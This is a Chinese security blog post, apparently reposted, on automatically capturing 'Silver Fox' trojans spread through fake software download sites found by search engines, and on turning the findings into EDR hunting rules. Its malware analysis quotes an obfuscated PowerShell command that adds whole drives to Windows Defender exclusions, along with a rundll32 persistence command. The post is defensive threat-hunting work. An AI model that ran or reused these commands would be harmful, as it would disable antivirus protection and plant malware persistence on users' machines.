文章总结： 该文档针对银狐黑产团伙利用搜索引擎投放木马的问题，提出了一种通过模拟员工搜索常用软件行为来自动捕获恶意样本的方法。作者详细介绍了从搜索仿冒网站、下载样本、解包分析到提取IOC/IOA指标，并最终编写EDR威胁狩猎规则实现自动化处置的全闭环流程。文中展示了具体的技术分析细节，如PowerShell反混淆和持久化机制，并强调了AI与自动化在提升安全运营效率方面的价值。 综合评分： 85 文章分类： 威胁情报,恶意软件,安全运营,实战经验

如何自动捕获银狐

原创

kelvin kelvin

Mimi is Cat

2026年2月26日 12:18 广东

背景

银狐团伙持续搜索引擎投放木马，所以对抗也是持续的，知己知彼才能百战百胜。

银狐团伙也是利用人性的弱点来获利，公司绝大部分员工是没有相关防范意识的，那既然知道普遍感染渠道就可以通过模拟员工行为去主动捕获银狐木马，提取特征实现持续跟踪银狐特征的变化，保证跟踪银狐特征变化就能通过EDR威胁狩猎在公司全网及时检测及自动化处置。

如何闭环

接下来行动，通过员工常用软件的关键词如todesk、向日葵、WPS、汽水音乐、快连VPN、clash、Snipaste、搜狗输入法、钉钉、飞书、chrome、firefox等去bing搜索引擎找到银狐，可以看到大量仿冒网站了，以todesk为例

也可以让AI写个搜索脚本定时执行返回结果，反正可以交给OpenClaw来干解放部分人力

这友链可太有意思了

看到这舒服了，一锅端了不用自己再去搜索了

先看这个搜狗是NSIS打包的，7z有支持查看的版本，解压提取配置文件

到这就出现了熟悉的配方了，路径及释放的文件都有了，这里无非就是通过MSI、NSIS、Inno等打包工具捆绑的银狐木马，提取出特征直接用即可，如果熟悉使用AI也可以交给AI来处理，现在已经有很多agent都很出色，以后可能大部分信息安全工作都能交给AI了。

恶意行为分析

1. 反混淆的PowerShell命令

cmd.exe /C powe””r””s””h””ell.exe -Ex””ec””uti””o””nPol””ic””y By””pa””s””s -C””om””ma””n””d Ad””d””-M””pPr””ef””ere””nce -Ex””cl””usion””Path C:\, D:\,E:\,F:\

实际功能：使用字符串分割绕过检测，执行PowerShell命令将C、D、E、F盘添加到Windows Defender排除路径

2. 多层解密释放

使用 DcryptDll::Decrypt 插件解密释放文件

密钥通过 func_308 → func_321 等混淆函数动态生成

加密数据存储在临时文件：temp_k.txt, lic.dat, Profilerjson, GPUCachexml, GPUCache2xml, Auto.dat

3. 持久化机制

rundll32.exe $APPDATA\Embarcadero\AutoRecoverDat.dll,DllRegisterServer

通过rundll32执行DLL的DllRegisterServer导出函数实现持久化

4. 进程执行时序

先执行 Verifier.exe（等待25秒）

再释放其他组件

最后执行DLL注册

再丢沙箱看看其他网络特征等，就可以提取到全部IOA、IOC，后面就是编写威胁狩猎规则和自动处置了前面文章《通过EDR威胁狩猎捕获银狐》已经有了这里不再赘述。

传送门https://mp.weixin.qq.com/s/ltGLRVersvGN9xaBeTe1aQ

结论

通过模拟用户行为搜索引擎下载软件，获取搜索结果，比对搜索结果提取非官方域名官方的排除非官方的保留，非官方的提取下载链接，提取后通过API接口将文件丢到情报沙箱，API接口获取分析结果后提取IOC、IOA信息，IOC、IOA信息编写威胁狩猎规则，配置自动处理规则将检测到的文件、设备隔离并通知相关一线人员处置。

这些均可以通过自动化完成且在多年前已应用，在应对对抗性较强的黑产组织时有奇效，且近几年AI已不断突破给信息安全也带来极大可能性。

以下是处理流程图

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Mimi is Cat kelvin kelvin《如何自动捕获银狐》